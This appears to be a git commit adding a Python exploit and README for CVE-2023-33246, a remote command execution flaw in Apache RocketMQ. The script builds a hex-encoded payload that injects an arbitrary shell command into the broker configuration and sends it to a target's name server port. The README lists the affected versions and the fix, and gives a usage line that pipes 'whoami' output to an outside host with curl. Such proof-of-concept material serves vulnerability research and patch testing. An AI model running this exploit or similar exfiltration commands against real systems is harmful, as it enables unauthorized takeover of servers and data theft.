add rocketMQ RCE CVE-2023-33246

03-Apache & Tomcat/Apache/CVE-2023-33246 Apache Rocket MQ-RCE/CVE-2023-33246_exp.py

@@ -0,0 +1,30 @@
+# CVE-2023-33246
+
+import socket
+import sys
+
+if len(sys.argv) < 4:
+    print('Usage: python3 poc.py <ip> <port> <command>')
+    sys.exit(1)
+
+
+def send_data(ip, port, payload):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    s.connect((ip, port))
+    s.sendall(payload)
+    s.close()
+
+
+if '__main__' == __name__:
+    ip = sys.argv[1]
+    port = int(sys.argv[2])
+    command = ' '.join(sys.argv[3:]).strip()
+    hex_payload_prefix = '000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20'
+    hex_payload_suffix = '3b0a'
+    payload = bytes.fromhex(hex_payload_prefix) + command.encode() + bytes.fromhex(hex_payload_suffix)
+    hex_payload_length = hex(len(payload) - 4)[2:]
+    payload = payload.hex().replace('000000cd000000', '000000' + hex_payload_length + '000000')
+    payload = bytes.fromhex(payload)
+
+    send_data(ip, port, payload)

03-Apache & Tomcat/Apache/CVE-2023-33246 Apache Rocket MQ-RCE/README.md

@@ -0,0 +1,19 @@
+
+## 影响版本
+Apache RocketMQ through 5.1.0
+
+## 修复方案
+upgrade to version 5.1.1 above for using RocketMQ 5.x    
+4.9.6 above for using RocketMQ 4.x
+
+## check
+```python
+python check.py --ip 127.0.0.1
+```
+
+## exp
+```python
+python CVE-2023-33246_exp.py 127.0.0.1 9876 curl 1.1.1.1:80/`whoami`
+```
+
+利用带外显示结果